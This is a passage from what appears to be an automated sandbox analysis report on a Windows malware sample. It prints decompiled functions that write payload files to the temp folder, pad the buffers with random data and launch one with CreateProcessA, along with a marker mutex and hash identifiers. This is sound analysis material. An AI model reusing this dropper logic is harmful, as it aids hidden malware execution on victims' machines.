				E00AAB3F0( &_v279, 0, 0x103);
				_v1060 = 0;
				E00AAB3F0( &_v1059, 0, 0x103);
				_v800 = 0;
				E00AAB3F0( &_v799, 0, 0x103);
				GetTempPathA(0x104,  &_v540);
				lstrcpyA( &_v280,  &_v540);
				lstrcpyA( &_v1060,  &_v540);
				lstrcpyA( &_v800,  &_v540);
				_t130 = lstrcatA;
				lstrcatA( &_v280, _a4);
				lstrcatA( &_v1060, _v1176);
				lstrcatA( &_v800, _v1172);
				E009A3C20(_t145,  &_v280,  *_t135,  *((intOrPtr*)(_t135 + 0x10)), 0); // executed
				E009A3C20(_t145,  &_v1060,  *((intOrPtr*)(_t135 + 4)),  *((intOrPtr*)(_t135 + 0x14)), 1); // executed
				_t126 =  &_v800;
				E009A3C20(_t145,  &_v800,  *((intOrPtr*)(_t135 + 0xc)),  *((intOrPtr*)(_t135 + 0x1c)), 0); // executed
				E00AAB3F0( &_v1244, 0, 0x44);
				_t142 = _t139 - 0x4dc + 0x3c;
				_v1244.cb = 0x44;
				_v1244.dwFlags = 1;
				_v1244.wShowWindow = 0;
				_t146 = _a16;
				if(_a16 != 0) {
					memcpy( &_v1168, 0xad6fb0, 0x1a << 2);
					_t130 = 0xad6fe4;
					asm("movsw");
					_t89 = E009A6291(_t146, 1);
					_t142 = _t142 + 0x10;
					_v1172 = _t89;
					_v8 = 0;
					_t147 = _t89;
					if(_t89 == 0) {
						_t90 = 0;
						__eflags = 0;
					} else {
						_t90 = E009A4040(_t89);
					}
					_t126 =  &_v1168;
					_v8 = 0xffffffff;
					E009A41D0(_t90,  &_v1168,  &_v1168);
				}
				E009A13B0(_t126, _t130, _t147,  &_v280); // executed
				CreateProcessA(0,  &_v280, 0, 0, 0, 0, 0, 0,  &_v1244,  &_v1260); // executed
				 *[fs:0x0] = _v16;
				_pop(_t131);
				_pop(_t136);
				_pop(_t94);
				return E00AAB46A(1, _t94, _v20 ^ _t138,  &_v1244, _t131, _t136);
			}



































      0x009a3df0
      0x009a3df3
      0x009a3df5
      0x009a3e00
      0x009a3e07
      0x009a3e0c
      0x009a3e0e
      0x009a3e14
      0x009a3e18
      0x009a3e29
      0x009a3e37
      0x009a3e3d
      0x009a3e43
      0x009a3e4a
      0x009a3e5d
      0x009a3e64
      0x009a3e77
      0x009a3e7e
      0x009a3e91
      0x009a3e98
      0x009a3eac
      0x009a3ec6
      0x009a3ed6
      0x009a3ee6
      0x009a3ee8
      0x009a3ef6
      0x009a3f06
      0x009a3f16
      0x009a3f2a
      0x009a3f42
      0x009a3f51
      0x009a3f5a
      0x009a3f6a
      0x009a3f71
      0x009a3f74
      0x009a3f7e
      0x009a3f88
      0x009a3f8f
      0x009a3f92
      0x009a3fa4
      0x009a3fa4
      0x009a3fa8
      0x009a3faa
      0x009a3faf
      0x009a3fb2
      0x009a3fb8
      0x009a3fbf
      0x009a3fc1
      0x009a3fcc
      0x009a3fcc
      0x009a3fc3
      0x009a3fc5
      0x009a3fc5
      0x009a3fce
      0x009a3fd7
      0x009a3fde
      0x009a3fde
      0x009a3fea
      0x009a4015
      0x009a4023
      0x009a402b
      0x009a402c
      0x009a402d
      0x009a403b

      APIs
      • _memset.LIBCMT ref: 009A3E4A
      • _memset.LIBCMT ref: 009A3E64
      • _memset.LIBCMT ref: 009A3E7E
      • _memset.LIBCMT ref: 009A3E98
      • GetTempPathA.KERNEL32(00000104,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EAC
      • lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EC6
      • lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3ED6
      • lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EE6
      • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EF6
      • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3F06
      • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3F16
        • Part of subcall function 009A3C20: _memset.LIBCMT ref: 009A3C6A
        • Part of subcall function 009A3C20: GetTickCount.KERNEL32 ref: 009A3CE2
        • Part of subcall function 009A3C20: _rand.LIBCMT ref: 009A3CF3
        • Part of subcall function 009A3C20: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009A3D26
        • Part of subcall function 009A3C20: _memmove.LIBCMT ref: 009A3D34
        • Part of subcall function 009A3C20: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009A3DC1
      • _memset.LIBCMT ref: 009A3F6A
      • CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 009A4015
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memset$lstrcatlstrcpy$AllocCountCreateIos_base_dtorPathProcessTempTickVirtual_malloc_memmove_randstd::ios_base::_
      • String ID: D
      • API String ID: 2126544836-2746444292
      • Opcode ID: 3d42653da93c1914851d02a4be2a99be458a179713ce9bc12cd18eef9fffdcf4
      • Instruction ID: f2ab8c39f0180e4d6292935fe7472066bfb7c00d4315632b66af50c3dd44fd70
      • Opcode Fuzzy Hash: 3d42653da93c1914851d02a4be2a99be458a179713ce9bc12cd18eef9fffdcf4
      • Instruction Fuzzy Hash: 8F5145B295021CABDB24DB64CC41FDEB3B8EF89700F00459AF619A7181DB746B45CFA5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BC9BB Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 202 9bc9bb-9bc9dc EnterCriticalSection 203 9bc9eb-9bc9f0 202->203 204 9bc9de-9bc9e5 202->204 206 9bca0d-9bca15 203->206 207 9bc9f2-9bc9f5 203->207 204->203 205 9bcaa9-9bcaac 204->205 209 9bcaae-9bcab1 205->209 210 9bcab4-9bcad2 LeaveCriticalSection 205->210 211 9bca2c-9bca50 GlobalHandle GlobalUnlock call 9b9e19 GlobalReAlloc 206->211 212 9bca17-9bca2a call 9b9e19 GlobalAlloc 206->212 208 9bc9f8-9bc9fb 207->208 214 9bc9fd-9bca03 208->214 215 9bca05-9bca07 208->215 209->210 219 9bca56-9bca58 211->219 212->219 214->208 214->215 215->205 215->206 220 9bca5a-9bca5f 219->220 221 9bca7d-9bcaa6 GlobalLock call aab3f0 219->221 222 9bca6f-9bca78 LeaveCriticalSection call 9b874a 220->222 223 9bca61-9bca69 GlobalHandle GlobalLock 220->223 221->205 222->221 223->222
      C-Code - Quality: 88%
      			E009BC9BB(void* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;
				void* _t36;
				long _t38;
				void* _t39;
				long _t51;
				signed char* _t53;
				signed int _t56;
				signed int _t57;
				void* _t61;
				signed int _t68;
				void* _t72;

				_t59 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t72 = __ecx;
				_t1 = _t72 + 0x1c; // 0x1c
				_t34 = _t1;
				_v8 = _t34;
				EnterCriticalSection(_t34);
				_t56 =  *(_t72 + 4);
				_t68 =  *(_t72 + 8);
				if(_t68 >= _t56 || ( *( *(_t72 + 0x10) + _t68 * 8) & 0x00000001) != 0) {
					_t68 = 1;
					if(_t56 <= 1) {
						L7:
						_t35 =  *(_t72 + 0x10);
						_t57 = _t56 + 0x20;
						_t83 = _t35;
						if(_t35 != 0) {
							_t36 = GlobalHandle(_t35);
							_v12 = _t36;
							GlobalUnlock(_t36);
							_t38 = E009B9E19(_t57, _t59, _t68, _t72, __eflags, _t57, 8);
							_t61 = 0x2002;
							_t39 = GlobalReAlloc(_v12, _t38, ??);
						} else {
							_t51 = E009B9E19(_t57, _t59, _t68, _t72, _t83, _t57, 8);
							_pop(_t61);
							_t39 = GlobalAlloc(2, _t51); // executed
						}
						if(_t39 == 0) {
							_t72 =  *(_t72 + 0x10);
							if(_t72 != 0) {
								GlobalLock(GlobalHandle(_t72));
							}
							LeaveCriticalSection(_v8);
							_t39 = E009B874A(_t61);
						}
						_v12 = GlobalLock(_t39);
						E00AAB3F0(_t40 +  *(_t72 + 4) * 8, 0, _t57 -  *(_t72 + 4) << 3);
						 *(_t72 + 4) = _t57;
						 *(_t72 + 0x10) = _v12;
					} else {
						_t53 =  *(_t72 + 0x10) + 8;
						while(( *_t53 & 0x00000001) != 0) {
							_t68 = _t68 + 1;
							_t53 =  &(_t53[8]);
							if(_t68 < _t56) {
								continue;
							}
							break;
						}
						if(_t68 >= _t56) {
							goto L7;
						}
					}
				}
				if(_t68 >=  *((intOrPtr*)(_t72 + 0xc))) {
					 *((intOrPtr*)(_t72 + 0xc)) = _t68 + 1;
				}
				 *( *(_t72 + 0x10) + _t68 * 8) =  *( *(_t72 + 0x10) + _t68 * 8) | 0x00000001;
				 *(_t72 + 8) = _t68 + 1;
				LeaveCriticalSection(_v8);
				return _t68;
			}





















      0x009bc9bb
      0x009bc9c0
      0x009bc9c1
      0x009bc9c4
      0x009bc9c6
      0x009bc9c6
      0x009bc9cb
      0x009bc9ce
      0x009bc9d4
      0x009bc9d7
      0x009bc9dc
      0x009bc9ed
      0x009bc9f0
      0x009bca0d
      0x009bca0d
      0x009bca10
      0x009bca13
      0x009bca15
      0x009bca2d
      0x009bca34
      0x009bca37
      0x009bca45
      0x009bca4b
      0x009bca50
      0x009bca17
      0x009bca1a
      0x009bca20
      0x009bca24
      0x009bca24
      0x009bca58
      0x009bca5a
      0x009bca5f
      0x009bca69
      0x009bca69
      0x009bca72
      0x009bca78
      0x009bca78
      0x009bca8f
      0x009bca98
      0x009bcaa3
      0x009bcaa6
      0x009bc9f2
      0x009bc9f5
      0x009bc9f8
      0x009bc9fd
      0x009bc9fe
      0x009bca03
      0x00000000
      0x00000000
      0x00000000
      0x009bca03
      0x009bca07
      0x00000000
      0x00000000
      0x009bca07
      0x009bc9f0
      0x009bcaac
      0x009bcab1
      0x009bcab1
      0x009bcabd
      0x009bcac3
      0x009bcac6
      0x009bcad2

      APIs
      • EnterCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000,?,009BCE11,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009BC9CE
      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,00000000,00000000,?,009BCE11,00000004,009BD78E,009AB424,009B0613,?,009AB86C), ref: 009BCA24
      • GlobalHandle.KERNEL32(?), ref: 009BCA2D
      • GlobalUnlock.KERNEL32(00000000,?,?,?,00000000,00000000,?,009BCE11,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009BCA37
      • GlobalReAlloc.KERNEL32 ref: 009BCA50
      • GlobalHandle.KERNEL32(?), ref: 009BCA62
      • GlobalLock.KERNEL32 ref: 009BCA69
      • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000000,?,009BCE11,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009BCA72
      • GlobalLock.KERNEL32 ref: 009BCA7E
      • _memset.LIBCMT ref: 009BCA98
      • LeaveCriticalSection.KERNEL32(?), ref: 009BCAC6
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
      • String ID:
      • API String ID: 496899490-0
      • Opcode ID: c16d0471b0c387aa37e07f21036be6245352e806339bfc277239aeee06a2b6d4
      • Instruction ID: d4e277c3a12652ca8b6cf7e7a68d207514a0d267c003b147dc13b861343f8ff8
      • Opcode Fuzzy Hash: c16d0471b0c387aa37e07f21036be6245352e806339bfc277239aeee06a2b6d4
      • Instruction Fuzzy Hash: 64319AB1A00708AFD720DFA8DD89B9ABBE9FF84714B05892AE552D7251DB30F8458B10
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AE991 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 97%
      			E009AE991(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				long _t42;
				void* _t43;
				void* _t46;
				long _t61;
				void* _t68;
				struct HWND__* _t70;
				void* _t73;

				_t68 = __edx;
				_push(0x4c);
				E00AAD2D1(0xac8089, __ebx, __edi, __esi);
				_t70 =  *(_t73 + 8);
				_t61 =  *(_t73 + 0x14);
				_t72 = "AfxOldWndProc423";
				 *(_t73 - 0x38) = _t70;
				 *(_t73 - 0x3c) = _t61;
				 *(_t73 - 0x30) = GetPropA(_t70, _t72);
				_t36 =  *(_t73 + 0xc) - 6;
				 *(_t73 - 0x28) = 0;
				 *((intOrPtr*)(_t73 - 4)) = 0;
				 *(_t73 - 0x2c) = 1;
				if(_t36 == 0) {
					_t72 = E009AC90B(_t61, 0, _t68, _t61);
					E009AE8A1(0, E009AC90B(_t61, 0, _t68, _t70),  *(_t73 + 0x10), _t37);
					goto L9;
				} else {
					_t43 = _t36 - 0x1a;
					if(_t43 == 0) {
						 *(_t73 - 0x2c) = 0 | E009AE919(_t61, _t68, _t70, E009AC90B(_t61, 0, _t68, _t70), _t61, _t61 >> 0x10) == 0x00000000;
						L9:
						if( *(_t73 - 0x2c) != 0) {
							goto L10;
						}
					} else {
						_t46 = _t43 - 0x62;
						if(_t46 == 0) {
							SetWindowLongA(_t70, 0xfffffffc,  *(_t73 - 0x30));
							RemovePropA(_t70, _t72);
							GlobalDeleteAtom(GlobalFindAtomA(_t72) & 0x0000ffff);
							goto L10;
						} else {
							if(_t46 != 0x8e) {
								L10:
								_t42 = CallWindowProcA( *(_t73 - 0x30), _t70,  *(_t73 + 0xc),  *(_t73 + 0x10), _t61); // executed
								 *(_t73 - 0x28) = _t42;
							} else {
								 *((intOrPtr*)(_t73 - 0x24)) = 0;
								 *((intOrPtr*)(_t73 - 0x20)) = 0;
								 *((intOrPtr*)(_t73 - 0x1c)) = 0;
								 *((intOrPtr*)(_t73 - 0x18)) = 0;
								_t72 = E009AC90B(_t61, 0, _t68, _t70);
								E009AB92C(_t53, _t73 - 0x24, _t73 - 0x2c);
								 *(_t73 - 0x28) = CallWindowProcA( *(_t73 - 0x30), _t70, 0x110,  *(_t73 + 0x10), _t61);
								E009AD4D9(_t61, _t68, _t53, _t73 - 0x24,  *(_t73 - 0x2c));
							}
						}
					}
				}
				return E00AAD32D(_t61, _t70, _t72);
			}











      0x009ae991
      0x009ae991
      0x009ae998
      0x009ae99d
      0x009ae9a0
      0x009ae9a3
      0x009ae9aa
      0x009ae9ad
      0x009ae9b6
      0x009ae9be
      0x009ae9c1
      0x009ae9c4
      0x009ae9c7
      0x009ae9ce
      0x009aea8d
      0x009aea99
      0x00000000
      0x009ae9d4
      0x009ae9d4
      0x009ae9d7
      0x009aea81
      0x009aea9e
      0x009aeaa2
      0x00000000
      0x00000000
      0x009ae9dd
      0x009ae9dd
      0x009ae9e0
      0x009aea43
      0x009aea4b
      0x009aea5c
      0x00000000
      0x009ae9e2
      0x009ae9e7
      0x009aeaa4
      0x009aeaaf
      0x009aeab5
      0x009ae9ed
      0x009ae9ee
      0x009ae9f1
      0x009ae9f4
      0x009ae9f7
      0x009ae9ff
      0x009aea0a
      0x009aea25
      0x009aea2d
      0x009aea2d
      0x009ae9e7
      0x009ae9e0
      0x009ae9d7
      0x009aea3a

      APIs
      • __EH_prolog3_catch_GS.LIBCMT ref: 009AE998
      • GetPropA.USER32 ref: 009AE9B0
      • CallWindowProcA.USER32 ref: 009AEA1C
        • Part of subcall function 009AD4D9: GetWindowRect.USER32 ref: 009AD51C
        • Part of subcall function 009AD4D9: GetWindow.USER32(?,00000004), ref: 009AD539
      • SetWindowLongA.USER32 ref: 009AEA43
      • RemovePropA.USER32 ref: 009AEA4B
      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 009AEA52
      • GlobalDeleteAtom.KERNEL32(?), ref: 009AEA5C
        • Part of subcall function 009AB92C: GetWindowRect.USER32 ref: 009AB93B
      • CallWindowProcA.USER32 ref: 009AEAAF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
      • String ID: AfxOldWndProc423
      • API String ID: 3351853316-1060338832
      • Opcode ID: f9d6bee0aceb4f6df359234cee3e7a936cfc04181fd0add157aa9c3ff82c5291
      • Instruction ID: 7505383044b3cf3f7aeb9aed539d33e9e7d78c2ae6b79cfaf37c3d0789991863
      • Opcode Fuzzy Hash: f9d6bee0aceb4f6df359234cee3e7a936cfc04181fd0add157aa9c3ff82c5291
      • Instruction Fuzzy Hash: 5F314BB1C01219ABCB159FA9DC489EEBBB8FF8A310F04452AF412B6251CB3599108BA4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A3C20 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 256 9a3c20-9a3c94 call aab3f0 call 9a39a0 call 9a2ec0 263 9a3cba-9a3cd8 256->263 264 9a3c96-9a3cb3 256->264 265 9a3cdb-9a3cf1 call 9a18a0 GetTickCount call aac926 263->265 264->265 266 9a3cb5-9a3cb8 264->266 271 9a3cf3-9a3d0b call aac938 265->271 266->265 274 9a3d0d-9a3d12 271->274 275 9a3d19-9a3d3e VirtualAlloc call aab080 274->275 276 9a3d14 274->276 279 9a3d53-9a3d71 call 9a3010 call 9a3870 275->279 280 9a3d40-9a3d50 275->280 276->275 285 9a3d9e-9a3de9 call 9a3af0 call ac6167 call aab46a 279->285 286 9a3d73-9a3d91 279->286 280->279 287 9a3d93 286->287 288 9a3d96-9a3d99 call 9a18a0 286->288 287->288 288->285
      C-Code - Quality: 78%
      			E009A3C20(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v119;
				void _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v200;
				char _v288;
				char _v296;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t57;
				void* _t62;
				signed int _t71;
				void* _t73;
				signed int _t84;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t117;
				void* _t118;
				void* _t124;
				intOrPtr _t125;
				void* _t126;
				signed int _t128;
				void* _t129;
				void* _t131;
				void* _t132;
				void* _t133;

				_push(0xffffffff);
				_push(0xac7adb);
				_push( *[fs:0x0]);
				_t56 =  *0xd0c910; // 0x3a0e8b0c
				_t57 = _t56 ^ _t128;
				_v20 = _t57;
				_push(_t57);
				 *[fs:0x0] =  &_v16;
				_t117 = _a12;
				_t89 = 0;
				_v128 = _a8;
				_v124 = _t117;
				_v120 = 0;
				E00AAB3F0( &_v119, 0, 0x63);
				_t131 = _t129 - 0x128 + 0xc;
				E009A39A0( &_v312, 1); // executed
				_v8 = 0;
				_t62 = L009A2EC0( &_v288, _a4, 0x22, 0x40); // executed
				if(_t62 != 0) {
					_t95 =  *((intOrPtr*)(_v312 + 4));
					_t96 = _t128 + _t95 - 0x134;
					asm("sbb eax, eax");
					_t67 = ( ~( *(_t128 + _t95 - 0xfc)) & 0xfffffffc) + 4;
					__eflags = ( ~( *(_t128 + _t95 - 0xfc)) & 0xfffffffc) + 4;
				} else {
					_t110 =  *((intOrPtr*)(_v312 + 4));
					_t96 = _t128 + _t110 - 0x134;
					_t67 =  *(_t128 + _t110 - 0x128) | 0x00000002;
					if( *((intOrPtr*)(_t128 + _t110 - 0x134 + 0x38)) == 0) {
						_t67 = _t67 | 0x00000004;
					}
				}
				E009A18A0(_t96, _t67, _t89);
				E00AAC926(GetTickCount());
				_t132 = _t131 + 4;
				_t124 = 0;
				do {
					_t71 = E00AAC938(0);
					asm("cdq");
					_t124 = _t124 + 1;
					 *((char*)(_t128 + _t124 - 0x75)) = _t71 % 0x1a + 0x41;
				} while (_t124 < 0x64);
				_t125 = _a16;
				if(_t125 != 0) {
					_t89 = 0x64;
				}
				_t113 = _t117 + _t89;
				_t73 = VirtualAlloc(0, _t117 + _t89, 0x1000, 4); // executed
				_t90 = _t73;
				E00AAB080(_t90, _v128, _t117);
				_t133 = _t132 + 0xc;
				if(_t125 != 0) {
					_v124 = _v124 + 0x64;
					memcpy(_t117 + _t90,  &_v120, 0x19 << 2);
					_t133 = _t133 + 0xc;
					_t117 = _v124;
				}
				asm("cdq");
				E009A3010( &_v296, _t90, _t117, _t113); // executed
				if(E009A3870( &_v288) == 0) {
					_t106 =  *((intOrPtr*)(_v312 + 4));
					_t107 = _t128 + _t106 - 0x134;
					_t84 =  *(_t128 + _t106 - 0x128) | 0x00000002;
					if( *((intOrPtr*)(_t128 + _t106 - 0x134 + 0x38)) == 0) {
						_t84 = _t84 | 0x00000004;
					}
					E009A18A0(_t107, _t84, 0);
				}
				_v8 = 0xffffffff;
				E009A3AF0( &_v200, _t117);
				_v200 = 0xad6de4;
				E00AC6167( &_v200);
				 *[fs:0x0] = _v16;
				_pop(_t118);
				_pop(_t126);
				_pop(_t91);
				return E00AAB46A(1, _t91, _v20 ^ _t128,  &_v200, _t118, _t126);
			}








































      0x009a3c23
      0x009a3c25
      0x009a3c30
      0x009a3c37
      0x009a3c3c
      0x009a3c3e
      0x009a3c44
      0x009a3c48
      0x009a3c51
      0x009a3c59
      0x009a3c60
      0x009a3c63
      0x009a3c66
      0x009a3c6a
      0x009a3c6f
      0x009a3c7a
      0x009a3c8a
      0x009a3c8d
      0x009a3c94
      0x009a3cc0
      0x009a3cca
      0x009a3cd3
      0x009a3cd8
      0x009a3cd8
      0x009a3c96
      0x009a3c9c
      0x009a3ca6
      0x009a3cad
      0x009a3cb3
      0x009a3cb5
      0x009a3cb5
      0x009a3cb3
      0x009a3cdd
      0x009a3ce9
      0x009a3cee
      0x009a3cf1
      0x009a3cf3
      0x009a3cf3
      0x009a3cf8
      0x009a3d00
      0x009a3d04
      0x009a3d08
      0x009a3d0d
      0x009a3d12
      0x009a3d14
      0x009a3d14
      0x009a3d20
      0x009a3d26
      0x009a3d2c
      0x009a3d34
      0x009a3d39
      0x009a3d3e
      0x009a3d42
      0x009a3d4e
      0x009a3d4e
      0x009a3d50
      0x009a3d50
      0x009a3d55
      0x009a3d5f
      0x009a3d71
      0x009a3d79
      0x009a3d83
      0x009a3d8a
      0x009a3d91
      0x009a3d93
      0x009a3d93
      0x009a3d99
      0x009a3d99
      0x009a3da4
      0x009a3dab
      0x009a3db7
      0x009a3dc1
      0x009a3dd1
      0x009a3dd9
      0x009a3dda
      0x009a3ddb
      0x009a3de9

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AllocCountIos_base_dtorTickVirtual_memmove_memset_randstd::ios_base::_
      • String ID: d
      • API String ID: 1404147012-2564639436
      • Opcode ID: 62f500e96477fa01046b9e466b51a96ac5f2c0f03e376694e73b85039525375a
      • Instruction ID: 6dd7e172a3f6e37a7437d3f9e28a9111523423d9b2361b0624719c4ef3440702
      • Opcode Fuzzy Hash: 62f500e96477fa01046b9e466b51a96ac5f2c0f03e376694e73b85039525375a
      • Instruction Fuzzy Hash: 8C51A271A012089FEB20DFA4DD82BDEB3B8EB45714F104169F906A72C2E735AE45CB91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A47D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 81%
      			E009A47D0(void* __ebx, void* __ecx, void* __edx) {
				int _v8;
				char _v16;
				intOrPtr _v20;
				char _v64;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t23;
				long _t24;
				intOrPtr _t28;
				void* _t29;
				void* _t34;
				void* _t60;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t68;
				signed int _t72;

				_t60 = __edx;
				_t43 = __ebx;
				_push(0xffffffff);
				_push(0xac7bc2);
				_push( *[fs:0x0]);
				_push(_t62);
				_t19 =  *0xd0c910; // 0x3a0e8b0c
				_push(_t19 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_t68 = __ecx;
				E009B5C3B(__ebx, _t62, 0);
				_t23 = CreateMutexA(0, 1, "cplusplus_me"); // executed
				_t63 = _t23;
				_t24 = GetLastError();
				if(_t63 == 0) {
					L3:
					CloseHandle(0);
					L4:
					E009B3218(_t68, "Local AppWizard-Generated Applications");
					_push(4);
					E009B1645(_t43, _t68, _t60, _t63, _t68, _t78); // executed
					_t28 = E009A6291(_t78, 0x8c);
